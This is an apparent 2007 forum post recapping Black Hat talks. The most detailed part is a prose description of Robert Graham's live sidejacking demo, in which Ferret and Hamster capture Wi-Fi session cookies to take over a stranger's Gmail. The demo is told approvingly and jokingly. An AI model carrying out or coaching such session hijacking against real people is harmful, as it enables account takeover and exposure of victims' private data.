Black Hat was an interesting event and I enjoyed a lot. It differs from Defcon in a number of ways. Mostly by the people attending and awesome food they made available.
As far as I could tell, most people attending seemed like a little more seasoned and professional than the mix you get at Defcon. Defcon has a huge range from teenage script kiddies to high level hackers and everything in between. Other than that, I couldn’t say as far as speakers go, one is tremendously better than the other and Black Hat is the kind of convention you should attend if you have someone else paying for it. I didn’t attend Defon this time and I am making those statements based on past experiences.
The convention began with a lecture from Richard Clarke, former advisor to the US National Security Council and it seemed to play well to the audience. His lecture was a mix of government bashing along with hopes for great strides in technology that might take place in the future.
My first briefing was “Understanding the heap by breaking it” by Justin Ferguson. He spent a lot of time on Double Free ( ) limitations and possibilities and the advantages of fast bin chunks over normal chunks. Perhaps a bit too much time and it was unfortunate he was unable to show any code, which he did apologize for.
Next briefing was “Database Forensics” by David Litchfield. His lecture was centered on Oracle and he did a good job showing the difficulty in analyzing that database when breached. He mentioned that there are no data specific forensic tools available on the market Most everything he displayed was in hex and he said he hoped to soon have a tool written to help eliminate so much manual forensic inspection which can be very tedious. He did a SQL injection attack and then did a forensic on the database.
Certainly one of the most popular briefings was “Tactical Exploitation” by H.D. Moore of Metasploit fame. He did a nice walk through of compromising an organization without the use of normal exploit code. A number of tools are not available yet but should be soon as new modules for Metasploit.
For me the most interesting lecture was “Simple solutions to complex problems from the lazy hackers handbook” by David Maynor and Robert Graham. Robert Graham gave his Web 2.0 hijacking presentation to a packed audience . The audience erupted with applause and laughter when Graham used his tools to hijack someone’s Gmail account during an unscripted demo. The victim in this case was using a typical unprotected Wi-Fi Hotspot and his Gmail account just popped on the large projection screen for the audience to see. I was wondering if he had just committed a felony by opening up the unsuspecting victim’s email account, lol? First he captures the Wi-Fi signals using his laptop and a tool called Ferret which he wrote earlier this year. The tool grabs Cookies and Session IDs from your Web Browser session sent over the air and stores it. Then, Graham fires up his new tool called Hamster which will process those Session IDs and Cookies so that they’re ready to clone. Once the identity is cloned, the attacker is able to jump on to online services like Gmail masquerading as the victim with full access to read and send email on behalf of the victim. Also, the attacker can go to maps.google.com and find the victim’s personal information like home address if it’s saved in to Google Maps. Since the session key doesn’t expire in email accounts like yahoo or hotmail, it doesn’t matter if the victim changes his password. Graham claims he can still log in, even for years later.
In reality the highlight was meeting up EH-net members Don, Brian and Chris. Also, Don and I had a great lunch with the people from Backtrack-Offensive Security, Muts and Ziplock. 2 great guys and they are working on getting Backtrack 3 out as soon as they can.
Last edited by Kev on Mon Aug 06, 2007 1:50 pm, edited 1 time in total.